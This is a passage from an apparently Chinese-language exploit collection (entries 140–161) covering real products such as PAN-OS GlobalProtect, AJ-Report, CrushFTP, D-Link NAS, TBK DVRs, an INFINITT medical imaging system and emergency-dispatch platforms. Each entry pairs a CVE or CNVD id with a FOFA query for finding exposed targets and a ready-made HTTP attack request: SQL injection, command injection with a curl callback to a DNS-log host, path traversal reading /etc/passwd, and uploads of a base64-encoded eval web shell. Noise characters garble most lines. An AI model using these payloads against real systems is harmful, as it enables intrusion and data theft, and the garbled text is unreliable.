& F. f* D/ I6 M+ ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: o! q% @3 q0 A/ n: M& e
Accept-Encoding: gzip, deflate, br9 O: H' M$ }6 \" N$ a3 k2 w5 K
Connection: close
' s3 e: U P. q7 I" V$ q& ^* ?1 PCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk1 Y9 T* [" ~0 U% H% s
Upgrade-Insecure-Requests: 1
: \ q5 x1 D" ]6 N7 C+ n. R) A: G/ j2 `; `" O* m1 V8 @" i( O2 f6 T
: ?1 e. b, `& I) w. V
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
& q( j6 b: S( Y. `0 V4 tCVE-2024-2566
% D$ _2 y* P! F# G9 nFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
' ]' e$ L* i: c! ~8 e6 hGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
u1 y9 F' `$ ^; p! MHost: x.x.x.x l' E) F- F Q; d0 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. v' Y+ Q8 S" C: Y; p$ z) A) I9 v; P7 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% Z) m/ q* Q% M5 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: [* W, F. D& j$ X3 A$ O- ?- SAccept-Encoding: gzip, deflate, br& u7 H8 y. \, \
Connection: close6 Z7 \; r9 T$ B# q: \1 l
Cookie: authcode=h8g9/ N7 X% g9 J% Q8 j! J7 B
Upgrade-Insecure-Requests: 15 J5 v5 `8 ^: L j! A1 s) k5 J8 Q
. A, |7 d9 Y; I" T+ |) ~, N, R. s1 c4 S
7 q: `! r' p H6 f/ S141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
" ?- h& }4 J* z. F! `FOFA:body="指挥调度管理平台") |3 _7 v6 O6 N: S4 Y
POST /app/ext/ajax_users.php HTTP/1.1+ {9 B* h' I0 K
Host: your-ip* G% l1 J2 q' c8 Q* L
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
?* O1 P z8 ~" k" g6 eContent-Type: application/x-www-form-urlencoded% u/ q; T4 r5 N. T
5 r8 m; Q2 @! N6 {% ^6 \+ y5 c. Z: W
) L$ l9 k# T3 @/ jdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
8 ~8 ]2 _# ?& U( y$ L8 M" t3 @, @' g' @6 K0 W
/ Q1 n, ~( H8 ?& M( S
142. CMSV6车辆监控平台系统中存在弱密码" f2 q9 P) x& e0 H- R7 f
CVE-2024-29666
4 h7 ^0 H. A% LFOFA:body="/808gps/"1 B2 Y2 V( B% J v9 T
admin/admin
' M! l. N& R5 D; f( W# Z* x143. Netis WF2780 v2.1.40144 远程命令执行
* C D( q9 H6 u% @7 PCVE-2024-25850
6 N7 V, q+ g: a, e6 {4 T* z5 sFOFA:title='AP setup' && header='netis' X- K l, V E( g! H% q
PAYLOAD
( |3 Q; T' a7 P, X' W$ P$ l1 ?4 p
6 @( ]" W0 t0 G% F* A9 m5 z6 L7 o144. D-Link nas_sharing.cgi 命令注入
. s6 ~; K6 {) `; g: iFOFA:app="D_Link-DNS-ShareCenter"/ _) ]8 }: N5 f9 O. {9 Q$ N
system参数用于传要执行的命令
* X/ i& U* U2 \GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.12 O) g% X2 F" c# X# b- n
Host: x.x.x.x
7 K/ p9 o8 s$ ~2 D! {5 X6 zUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0; k6 X) o$ @7 p4 r& k
Connection: close/ j/ `8 T/ z- Z( T$ u
Accept: */*
7 ]3 R) e$ `. m; q: i4 f/ ZAccept-Language: en
& K( K' h9 k8 H' o1 Z& P) yAccept-Encoding: gzip* L/ k/ n4 V7 _, y g% ~+ k
9 w) N; m0 O' ]" y& @ ~9 U! a6 I3 k o2 R
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入3 {% a0 ~# S$ x6 D8 C) k b
CVE-2024-3400: x( U A: J' K0 W& W
FOFA:icon_hash="-631559155"+ C5 i% B0 f- R! t( }. V
GET /global-protect/login.esp HTTP/1.13 z" _( i9 @% L# b- \ M
Host: 192.168.30.112:1005
) x z8 I5 y( z: d% y: a: XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 U K! x4 f% Z4 H( A/ m0 z
Connection: close6 Z3 |2 |7 V2 a6 p L0 n* w
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
* t" } V7 Y! _5 |3 |Accept-Encoding: gzip
. r. i6 o) @: g$ p7 x* ~: D9 o6 X3 z7 j8 j2 d
$ X( W- V, n+ ]. F+ x9 t, Z
146. MajorDoMo thumb.php 未授权远程代码执行
. e- J, }! e. j# c9 y; LCNVD-2024-021758 m" M0 k l6 W, ?+ ?; ~& z9 b' f
FOFA:app="MajordomoSL"
3 S( g4 d) L" m y9 G2 ]9 ?GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
! d# h) t7 D0 W. J: r; r$ X CHost: x.x.x.x L/ i3 ~" d% H$ G* }5 i O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
) @. F" m: a) P& cAccept-Charset: utf-8
/ `8 j" [" c; n& j) l7 B/ C# E% vAccept-Encoding: gzip, deflate( u# ^/ Z8 k& N3 l; q% x% W T R
Connection: close4 M _& @$ ?5 u0 X; F! e
, j) W% o. H- {$ B/ Z% K4 j
- a5 `8 A7 {( _1 C J& b147. RaidenMAILD邮件服务器v.4.9.4-路径遍历' K5 u. U% s) } K
CVE-2024-323995 Y, H" P, p" B8 L- G) r
FOFA:body="RaidenMAILD"
% M" Y) \0 ]8 [ ^5 ], LGET /webeditor/../../../windows/win.ini HTTP/1.18 H7 }. a0 _6 ^) V# {& {1 [
Host: 127.0.0.1:81
1 O2 _* A6 h# z' `Cache-Control: max-age=0' L0 o; n& R5 |6 }6 r" i# J
Connection: close
9 C9 t! i. o; T) T3 v7 t5 Z3 Y/ ~- D L, B+ e- {
# q' k% S3 Q2 y. O; i148. CrushFTP 认证绕过模板注入/ L3 E4 e' s% f) E+ c7 G7 M
CVE-2024-4040% t: C* e' C- W6 w5 ?# X3 P. U1 w
FOFA:body="CrushFTP"2 {: \+ r6 e& \2 E) p
PAYLOAD6 x- t& E: z. ^" w3 m
* \/ e. }, m- ~! L* l- g k149. AJ-Report开源数据大屏存在远程命令执行
r# z7 G ~& Z% N3 O/ q0 S% |FOFA:title="AJ-Report"
0 A- y, c: x& ]7 U U3 Z1 H" s! D* Z R) h; w+ A& L) x
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
8 i4 N8 g% c" `" f( c* VHost: x.x.x.x) i& p: Y; `* U z H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- X7 |5 z! ~$ t( K* x9 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. b! z0 j! s& i6 A% T
Accept-Encoding: gzip, deflate, br
6 s$ H, r; j& d7 HAccept-Language: zh-CN,zh;q=0.93 A" l5 g0 `; h% ]
Content-Type: application/json;charset=UTF-85 q* J+ ?* I: c9 m& a% `% v- a
Connection: close
' k& W; H* o. s# ]# A/ E# C
6 i! r% w! A- G |2 [- G( m! R{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
! J: ], o! K4 e3 c& T3 H2 a- [# v. p3 k- c
% P+ t! `3 P. v7 v3 F9 d- V150. AJ-Report 1.4.0 认证绕过与远程代码执行
5 w: d7 s7 Z3 W5 `8 z$ U# I% pFOFA:title="AJ-Report" H9 X* v( {4 \3 n8 [
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1. s) m/ L# t6 B Q6 T* K
Host: x.x.x.x% C' F$ d0 t+ z. Q: [9 R8 a( \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* b& T0 Y! y- w3 B# hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. c/ q. t5 d5 A- d; t+ [! p, RAccept-Encoding: gzip, deflate, br
. u6 j1 M4 A0 U5 ~- T0 ^+ u, Y& fAccept-Language: zh-CN,zh;q=0.9
, S) _2 S& [4 {( \/ F' T/ @( KContent-Type: application/json;charset=UTF-8
8 u+ ?9 S' T1 S! ~& wConnection: close
8 n$ t2 E$ x6 F8 N# }Content-Length: 339
; T+ Y; T( m4 u5 `+ D& y' M, X9 C- n7 F; Z, L, B
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: W" [" }, e Y: r1 ^, d& U- O2 [' Q5 K
4 r& R2 R& `+ A& U4 ^) q/ ]6 y, r
151. AJ-Report 1.4.1 pageList sql注入5 }. V3 [ N' _+ X0 m8 t$ @
FOFA:title="AJ-Report"! i- ?7 A2 r' h+ u* P( k: P: Q
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
4 }+ g, T' s- f- h( @Host: x.x.x.x, o% n! q5 V) s+ f( Q2 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. B# M6 p9 e- B+ J0 o7 }Connection: close+ ]1 Y/ ?8 F0 L# r: D0 G
Accept-Encoding: gzip
; B0 Z; z$ D; U0 z& R& `6 r# q" T. \2 ]- ^; s+ T2 ` J5 {) U
3 j+ P% G- _9 g7 q& @2 }
152. Progress Kemp LoadMaster 远程命令执行
* `& f5 z G& `# {, k2 rCVE-2024-1212
; J1 S# p4 o; c6 PLoadMaster <= 7.2.59.2 (GA)* K9 p0 k- S; X9 g! U: `
LoadMaster<=7.2.54.8 (LTSF)
6 Y! k% ?& L% w. |% qLoadMaster <= 7.2.48.10 (LTS)" M+ K+ K8 j! f2 O) f; R
FOFA:body="LoadMaster"
( a" f' r4 }, Z8 v, L' P3 _JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码, l; d" Y! [; ` W6 g' V- ~5 H
GET /access/set?param=enableapi&value=1 HTTP/1.1
8 x Z3 v) c) X6 M' w, `5 [Host: x.x.x.x
( o, O5 ?1 z/ K: [, ?( UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
2 E9 A7 A" J# K" PConnection: close
0 W9 A. B/ {/ U `, K/ MAccept: */*
0 B+ v1 X+ w% U9 j+ lAccept-Language: en5 q$ C1 O2 D* H8 n4 D ^# d$ j
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
$ n( G5 \2 [ |9 M3 ^# }Accept-Encoding: gzip
0 ]7 a& O9 N( \9 A( t- Y7 w) G$ t2 {4 F
8 Y% x: ~ c! k4 r153. gradio任意文件读取) o+ F( o( [8 a
CVE-2024-1561FOFA:body="__gradio_mode__"
$ _, s5 i, {- E: y) g8 V4 J第一步,请求/config文件获取componets的id
5 p9 i* ~6 q; c phttp://x.x.x.x/config
8 S! [7 g9 _! {: f( m' m' T a
: \, z9 A( [+ u9 G2 o( M
- P1 t) L5 M" K2 J& y) i2 g& r- z: o. R第二步,将/etc/passwd的内容写入到一个临时文件! C# H( x/ N' ~7 _, R" b! O
POST /component_server HTTP/1.1
0 f. I& y( m7 g' D, F2 JHost: x.x.x.x
8 x7 X5 t8 A1 C2 T! P& Z, tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
0 q- I# O2 N7 |Connection: close
/ S7 U# S+ w) f' i Y0 j0 M( gContent-Length: 115
8 U7 M- Q" P/ s# {Content-Type: application/json1 J$ f a3 s1 C9 X
Accept-Encoding: gzip( G: M+ K1 k4 q+ X& m! t
* p) W h* t- T" Z- f4 G6 o
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
/ z1 a. |- P! [3 @! P1 h
4 ~# t& F0 L" V8 [2 H
! v/ v7 t2 ^" E, i- J第三步访问
' H* { f Q' }; ?2 G' v7 zhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd$ T p, K7 c+ q+ I5 e/ N
0 t0 { n: I1 C# C& n1 b: D
: `, l0 _* C% D; ] x154. 天维尔消防救援作战调度平台 SQL注入! S1 v( e! }2 w* K
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
: z/ u2 w' h) r2 Z$ b0 ~POST /twms-service-mfs/mfsNotice/page HTTP/1.1, C ^9 _7 M) Z% F, Y. |+ w
Host: x.x.x.x
" J+ P5 N' K* b. @) s" ~Content-Length: 106
# ^; q! g6 [# e) h1 s7 OCache-Control: max-age=0( ?5 u' `- s: y4 n8 F. i7 n- ~+ @ S
Upgrade-Insecure-Requests: 1
; K. l' j0 d1 P2 _, B bOrigin: http://x.x.x.x: w# V2 O: M0 P$ u5 ~$ S* _+ o
Content-Type: application/json# y ~4 }+ d3 C# T' d5 F& |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.361 a2 p( U% w; m9 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 p% g9 U" D3 v' ZReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
/ ]$ a/ C3 {+ A/ R; {* `6 X; v6 oAccept-Encoding: gzip, deflate
5 r |4 B6 t8 l/ lAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7) d: r+ [. M: u1 o
Connection: close
! p5 {" P! g, Y6 N1 c/ Q' z; t" [) G* H+ c& f" x! h8 q, C: q
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}; D1 e6 f( u- a( A
: P# l1 s0 k2 j; J. \
. O* S6 D! @. k
155. 六零导航页 file.php 任意文件上传
# g! {2 ]" t0 S7 n- p0 DCVE-2024-34982
& G/ Q) t8 [3 ?. E8 i; OFOFA:title=="上网导航 - LyLme Spage"# Q7 l9 {, p( D7 P7 M$ ?5 q
POST /include/file.php HTTP/1.1
/ T. x# }) E7 L" P% EHost: x.x.x.x
& i: A. x8 N1 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; |8 y9 x* h3 ?
Connection: close
4 |* h ] p# {& H: u% AContent-Length: 232/ G. y" i, q0 c" r! W
Accept: application/json, text/javascript, */*; q=0.01
% U4 R6 t; f; d7 u! ]8 x7 N/ Y; {Accept-Encoding: gzip, deflate, br
. Q$ e5 }5 q: a6 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* w# q/ Z- a$ y4 `5 D1 C8 B
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
, Q3 R4 M! A; h8 \7 WX-Requested-With: XMLHttpRequest
, f6 @+ }$ y( J
& O3 F& O, c( T/ ?2 P-----------------------------qttl7vemrsold314zg0f6 j- W8 T" u2 @) V# J# W2 l
Content-Disposition: form-data; name="file"; filename="test.php"
( b- I6 a* w# NContent-Type: image/png7 [- _$ c; G' u. s9 r$ w
) \: R. |5 n4 `% v8 v<?php phpinfo();unlink(__FILE__);?>
* {0 d7 v% p" ~, L, B-----------------------------qttl7vemrsold314zg0f--
* T2 I1 R4 a/ [! O2 G+ v. y" }: z9 ]& X$ z
3 \; W4 ?: _4 M Z- }/ K/ j- }
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php0 D5 ]% |! _- ]; x n: n6 H: `
8 {" S$ c0 |7 M
156. TBK DVR-4104/DVR-4216 操作系统命令注入
$ j/ z" C) \ Y7 f a, B" Q! H9 C% r% ICVE-2024-3721+ e! H% }6 @/ Y6 h1 v. V {' U0 l
FOFA:"Location: /login.rsp"
5 X5 E8 D i O6 }2 _* b·TBK DVR-41041 p! r! O; A$ s" ~7 I6 f1 E! @
·TBK DVR-4216
2 _* _8 c. ?8 j, k, Scurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"2 q' U5 w( I( w3 ?% l3 ~
5 e/ [7 C/ \: j
+ v7 n: i1 O+ P1 R2 W9 LPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
+ N. l( o* y6 F/ ~ ?: pHost: x.x.x.x4 C$ C6 @4 z! C% C9 @
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ g5 }- r- L5 p. N
Connection: close. w9 [) ~, m9 \# _
Content-Length: 0 c0 u5 g; X$ h& B: W( N
Cookie: uid=1/ B4 @* y b/ i0 {$ S) d! Z( K
Accept-Encoding: gzip' N+ ?; }/ n3 g/ F9 ?3 i0 H# e2 n
/ D; m( v0 |% [2 ^$ ^- V8 ^* y0 [; y6 N! @) M5 Z; N
157. 美特CRM upload.jsp 任意文件上传
* L' a; I6 n! @1 s) P4 jCNVD-2023-06971
) W, C6 m' C; b# ^. ]* S1 W! AFOFA:body="/common/scripts/basic.js"
5 ?" v, s4 i" ^ SPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1* u! {; Q; S9 C7 {) v
Host: x.x.x.x) P+ y; t5 P; `* F' i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
1 T+ p9 q0 N3 a" M" x1 _Content-Length: 709
E6 c( J- i( d" S! e7 ]0 P7 ^ UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% {; p- {! `; h. }& X7 T5 r) f7 QAccept-Encoding: gzip, deflate
, \ e8 x/ \# YAccept-Language: zh-CN,zh;q=0.9
, G9 J! {; d* ?! }/ ACache-Control: max-age=0- @8 | D: X6 h: U+ Q
Connection: close
|# H# G- @4 OContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN' u5 o0 J$ p# a2 B1 n, x
Upgrade-Insecure-Requests: 1
5 U; j9 e8 z& r1 ]
5 t5 r6 ?/ E* `% E% [" t------WebKitFormBoundary1imovELzPsfzp5dN: S$ d' k# \! m) M1 a" h
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"6 F% m0 X) N7 [. b; ?% ~
Content-Type: application/octet-stream E+ ^& l$ D3 E ]9 {
8 Q; C0 z3 ~/ `) I0 k8 l0 nnyhelxrutzwhrsvsrafb! O$ U1 |& _3 H1 c
------WebKitFormBoundary1imovELzPsfzp5dN
8 Y4 p$ Z& \( q& Z1 |) s b) XContent-Disposition: form-data; name="key"
1 g% t; g) O+ q
& Q" d8 n7 V1 U: o8 cnull
z/ D" k7 i2 ~. K! Z; z0 H. K------WebKitFormBoundary1imovELzPsfzp5dN
/ {7 S# m& N G9 z- }/ XContent-Disposition: form-data; name="form"
$ ~* z+ W* k0 k" D# R
( z4 _4 A8 G' |2 Y$ Xnull
P7 r( x, c- M3 W------WebKitFormBoundary1imovELzPsfzp5dN6 Z- P, H8 ?- b+ x
Content-Disposition: form-data; name="field"
+ V& a. O. `- B& ?' H! r
+ |- _; |8 q3 i; o4 @! Rnull
- f$ T# p9 ^# i. `------WebKitFormBoundary1imovELzPsfzp5dN
$ U7 H4 V( v% a9 [Content-Disposition: form-data; name="filetitile"
j ]: x! J& P4 k. G3 l4 G5 z+ V2 b7 C; n. _
null
3 O7 ]5 h: J8 g( R------WebKitFormBoundary1imovELzPsfzp5dN; \4 z2 R- O" X0 _
Content-Disposition: form-data; name="filefolder" Q! \3 p! W, E6 H) S+ t
' [' S5 S8 I5 {6 G' S9 b/ a( }
null# z/ x0 I/ M% R0 r' v* K
------WebKitFormBoundary1imovELzPsfzp5dN--
5 e: z' R8 H5 j3 V( V* V6 E; {& l( e5 x- { R, W
5 _1 B8 V8 P4 z" Z
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp& l- X: f6 l8 X: b- e
' [7 `2 r; T, \158. Mura-CMS-processAsyncObject存在SQL注入
* P: S) X& p4 SCVE-2024-32640
$ h7 U; b+ C6 Q! hFOFA:"Generator: Masa CMS": f6 u/ _! `2 D- ~& n8 d
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
% v2 y! \5 o# d8 }Host: {{Hostname}}$ E* C$ m2 z9 K
Content-Type: application/x-www-form-urlencoded
0 R S9 i. F$ c8 S# |
& I v4 i8 V4 E# F. pobject=displayregion&contenthistid=x\'&previewid=1
! ]2 w9 M5 V3 d h, B$ i4 w
( U D, X/ C4 C/ A- x$ X
. ]5 A. Y* N# K3 [2 F3 _159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传* V! x( Y) d3 ^, X) }
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
/ N* {1 i$ L5 e- v, h3 U. ZPOST /webservices/WebJobUpload.asmx HTTP/1.1
8 o* F+ @7 t o! P( e6 JHost: x.x.x.x z" x' q9 y% G* Q. H( C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.361 R r& ?+ \' G- c9 W: b
Content-Length: 1080
2 `: l: y& p8 J# L5 ?# bAccept-Encoding: gzip, deflate4 {$ A0 q1 N" D+ Q0 A! n
Connection: close
) j/ M" F3 a7 y# e( Z1 hContent-Type: text/xml; charset=utf-8
! ]0 K3 j8 s9 d% P' v5 KSoapaction: "http://rainier/jobUpload"
* @7 L& a* f4 s( h4 y! m3 n
( T, }1 K& X% ?% X4 V, a. ~<?xml version="1.0" encoding="utf-8"?>& I: k! {( d/ _ H
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
" ^& b3 p; G1 J9 p3 v) v g0 D$ U9 {. p<soap:Body>( u+ J; C$ \0 B5 e4 W
<jobUpload xmlns="http://rainier">
" O! V: C$ c" Y: m% G0 d<vcode>1</vcode>
7 ?# x7 d5 Y% T& e- N<subFolder></subFolder>
' d% e$ d* e8 B; }& H: L<fileName>abcrce.asmx</fileName>" A2 n" E9 y0 O* o" J- p
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
5 g# J- D5 Y: o0 c+ s" H' H1 K, p</jobUpload>6 N2 Q2 H3 R2 A; n4 [6 f/ a
</soap:Body>3 N$ m- z' ~, k2 [3 K* T) B: `! T5 O
</soap:Envelope>
5 {8 H! y% A5 x
# `# _6 ?6 Q; z+ e: Y+ {: T( A
' T: K( Y: b2 d7 c. c/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
4 O9 |0 k0 M+ j' z$ W1 P5 _ Y2 t1 e! a
9 L, n0 ]0 h+ }! a' v: S6 [: A/ \160. Sonatype Nexus Repository 3目录遍历与文件读取* z6 \/ t3 l( b, |
CVE-2024-49569 k7 J# C6 c+ ]4 Y
FOFA:title="Nexus Repository Manager"1 p& E5 G) w. O' v7 }' y1 F
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
6 W1 S4 d2 g+ w& P2 gHost: x.x.x.x
( @) O& o# i8 c+ i) M( e- t; PUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.04 w7 U# B z6 J7 g3 w- s1 c7 m) V
Connection: close
4 |9 p8 X. a2 RAccept: */*
; u( A$ [: J* IAccept-Language: en
6 b$ a3 ` j* J! X7 g+ r! ?# M* TAccept-Encoding: gzip
4 v8 [# @; f+ B$ s' Z& t( P
' J* `" i' {: F6 d' `
6 Q4 x: q) u, S6 m161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 b0 O+ [4 i- d7 z
FOFA:body="/KT_Css/qd_defaul.css"
! L$ Q9 V @/ V& }2 D0 ?& o第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
2 k: }9 d r1 ~: j: B' HPOST /Webservice.asmx HTTP/1.1
0 @3 V, x. A2 JHost: x.x.x.x1 v) r, d! s! G# G; a3 C' k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36: _& U. c# b. z$ L* J
Connection: close
- }, M9 I o5 IContent-Length: 4452 V6 |- S3 }2 P+ `# R1 r& e
Content-Type: text/xml
$ l M; V) z2 R3 vAccept-Encoding: gzip
) @4 ]) \- t/ W2 Z4 J0 f3 V
2 A2 V0 u7 g! F<?xml version="1.0" encoding="utf-8"?>
$ _! `$ Y0 I" c; T" {, B6 R( P7 S<soap:Envelope xmlns:xsi="9 Z. D& j2 h! g1 v4 K( H6 a% u
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
6 z; Q/ E' c7 f1 Q* `. |xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
. ]9 O! f; o: p/ E1 K1 W<soap:Body>
' j4 S3 S5 N; j0 U. Z' u<UploadResume xmlns="http://tempuri.org/">
7 q0 [9 w! Z/ f I5 u. Q" a/ P6 j# K<ip>1</ip>' o& ?4 z7 d# X4 t
<fileName>../../../../dizxdell.aspx</fileName>7 @! g; r$ A/ k5 F: r, v
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>" C7 T" B4 X& h) j- n& y1 `( V4 k
<tag>3</tag>
; \% j; ]0 V% N0 o8 n</UploadResume>. {3 ~4 E5 n. g: ]. ~: E! T4 |+ |) i
</soap:Body>
$ H7 R4 z4 W) U; W B</soap:Envelope>
